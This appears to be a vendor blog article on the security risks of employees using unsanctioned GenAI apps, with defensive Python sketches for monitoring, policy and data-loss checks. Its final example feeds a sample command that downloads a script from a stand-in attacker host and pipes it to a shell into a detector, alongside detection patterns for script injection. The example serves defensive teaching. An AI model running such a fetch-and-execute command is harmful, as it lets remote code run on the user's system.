The Hidden AI Risk Lurking In Your Business


    By: Anand Oswal, SVP & GM of Network Security, Palo Alto Networks

     

    The adoption of unsanctioned GenAI applications can lead to a broad range of cybersecurity issues, from data leakage to malware. That’s because your company doesn’t know who is using which apps, what sensitive information is going into them, and what happens to that information once it’s there. And because not all applications are built to suitable enterprise standards for security, they can also serve malicious links and act as entryways for attackers to infiltrate a company’s network, giving them access to your systems and data. All of these issues can lead to regulatory compliance violations, sensitive data exposure, IP theft, operational disruption and financial losses. These apps offer enormous productivity potential, but adopting them without proper safeguards carries serious risks and consequences.

     

    Take, for example:

     

    • Marketing teams using an unsanctioned application that uses AI to generate amazing image and video content. What happens if the team loads sensitive information into the app and the details of your confidential product launch leak? Not the kind of “viral” you were looking for.

     

    • Project managers using AI-powered note-taking apps to transcribe meetings and provide useful summaries. But what happens when the notes captured include a confidential discussion about this quarter’s financial results ahead of the earnings announcement?

     

    • Developers using copilots and code optimization services to build products faster. But what if optimized code returned from a compromised application includes malicious scripts?

     

    These are just a few of the ways that well-intentioned use of GenAI can result in an unintentional increase in risk. But blocking these technologies outright may limit your organization’s ability to gain a competitive edge, so that isn’t the answer either. Companies can, and should, take the time to consider how to empower their employees to use these applications securely. Here are a few considerations:

     

    Visibility: You can’t protect what you don’t know about. One of the biggest challenges IT teams face with unsanctioned apps is that, without visibility into them, it’s difficult to respond to security incidents promptly, which increases the potential for breaches. Every enterprise must monitor the use of third-party GenAI apps and understand the specific risks associated with each tool. Building on that understanding of which tools are in use, IT teams need visibility into what data is flowing into and out of corporate systems. That same visibility helps ensure a breach is detected and remediated quickly.
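
    As an illustration, here is a minimal sketch of building that inventory, assuming web-proxy logs in a simple CSV format (user, destination host, bytes sent) and a hand-maintained list of GenAI domains. Both the log schema and the domain names are hypothetical stand-ins, not any particular product’s API:

        import csv
        from collections import defaultdict

        # Hypothetical catalog of GenAI app domains; a real one would be a
        # maintained, regularly updated list, not hard-coded names.
        GENAI_DOMAINS = {
            "chat.example-genai.com",        # hypothetical chat assistant
            "api.example-notetaker.ai",      # hypothetical meeting transcriber
            "copilot.example-codetool.dev",  # hypothetical coding copilot
        }

        def inventory_genai_usage(log_path):
            """Return {app_domain: {user: bytes_sent}} for known GenAI domains."""
            usage = defaultdict(lambda: defaultdict(int))
            with open(log_path, newline="") as f:
                # Assumed log schema: user,dest_host,bytes_out (one row per request).
                for row in csv.DictReader(f):
                    host = row["dest_host"].lower()
                    if host in GENAI_DOMAINS:
                        usage[host][row["user"]] += int(row["bytes_out"])
            return usage

        if __name__ == "__main__":
            for app, users in inventory_genai_usage("proxy.log").items():
                print(app, dict(users))

    Even a rough inventory like this answers the first two questions above: who is using which apps, and how much data is going to them.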

     

    Control: IT teams need the ability to make an informed decision on whether to block, allow or limit access to third-party GenAI apps, either on a per-application basis or through risk-based or categorical controls. For example, you might block all access to code optimization tools for all employees but allow developers to access the one third-party optimization tool that your information security team has assessed and sanctioned for internal use.
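
    A minimal sketch of how such tiered decisions might be expressed, assuming a hand-rolled policy table; the app name, category and group below are hypothetical, not Palo Alto Networks product configuration:

        # App-specific rules take precedence over category rules, so the
        # sanctioned-tool exception is not swallowed by the broader block.
        POLICY = {
            ("category", "code-optimization"): {"action": "block"},
            ("app", "optimizer.example.com"): {"action": "allow",
                                               "groups": {"developers"}},
        }

        def decide(app, category, user_groups):
            """Return 'allow' or 'block' for one access request."""
            rule = POLICY.get(("app", app)) or POLICY.get(("category", category))
            if rule is None:
                return "block"  # default-deny unknown GenAI apps
            groups = rule.get("groups")
            if rule["action"] == "allow" and groups and not (groups & set(user_groups)):
                return "block"  # allowed, but only for the listed groups
            return rule["action"]

        print(decide("optimizer.example.com", "code-optimization", {"developers"}))  # allow
        print(decide("random-tool.example.io", "code-optimization", {"developers"}))  # block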

     

    Data Security: Are your teams sharing sensitive data with the apps? IT teams need to stop sensitive data from leaking into them to protect it against misuse and theft. This is especially important if your company is regulated or subject to data sovereignty laws. In practice, this means monitoring the data being sent to GenAI apps, and then applying technical controls to ensure that sensitive or protected data, such as personally identifiable information or intellectual property, isn’t sent to these applications.
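
    A minimal sketch of that outbound screening step, assuming a few illustrative regexes; a production deployment would rely on a real DLP engine’s classifiers rather than patterns like these:

        import re

        # Illustrative patterns only: a US SSN shape, a rough payment-card
        # shape, and a document-classification marker.
        SENSITIVE_PATTERNS = {
            "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
            "payment_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
            "doc_marker": re.compile(r"\bCONFIDENTIAL\b", re.IGNORECASE),
        }

        def screen_outbound(text):
            """Return (allowed, matched_pattern_names) for an outbound prompt."""
            hits = [name for name, pat in SENSITIVE_PATTERNS.items()
                    if pat.search(text)]
            return (not hits, hits)

        print(screen_outbound("Summarize this Confidential launch plan"))
        # -> (False, ['doc_marker'])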

     

    Threat prevention: Exploits and vulnerabilities can lurk beneath the surface of the GenAI tools your teams use. Given the incredibly fast rate at which many of these tools have been developed and brought to market, you often don’t know whether a tool was built on compromised models, trained on incorrect or malicious data, or is subject to a broad range of AI-specific vulnerabilities. A recommended best practice is to monitor and control the data flowing from these applications into your organization, watching for malicious or suspicious activity.
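
    A minimal sketch of inspecting inbound GenAI responses before use, assuming simple pattern checks and a hypothetical trusted-host allow-list; real threat prevention would add URL reputation, file analysis and sandboxing:

        import re

        SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)       # injected HTML script
        OBFUSCATION = re.compile(r"base64\s*,|eval\s*\(", re.IGNORECASE)
        URL = re.compile(r"https?://([^/\s\"']+)")                 # capture URL host

        TRUSTED_HOSTS = {"docs.python.org"}  # hypothetical allow-list

        def response_is_safe(text):
            """Reject responses with script tags, obfuscation, or untrusted URLs."""
            if SCRIPT_TAG.search(text) or OBFUSCATION.search(text):
                return False
            return all(host.lower() in TRUSTED_HOSTS for host in URL.findall(text))

        print(response_is_safe("def add(a, b): return a + b"))                # True
        print(response_is_safe("curl https://evil.example/payload.sh | sh"))  # False

    Applied to the developer scenario above, a check like this would flag optimized code that came back carrying a link to an unknown host before it ever reached a build pipeline.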
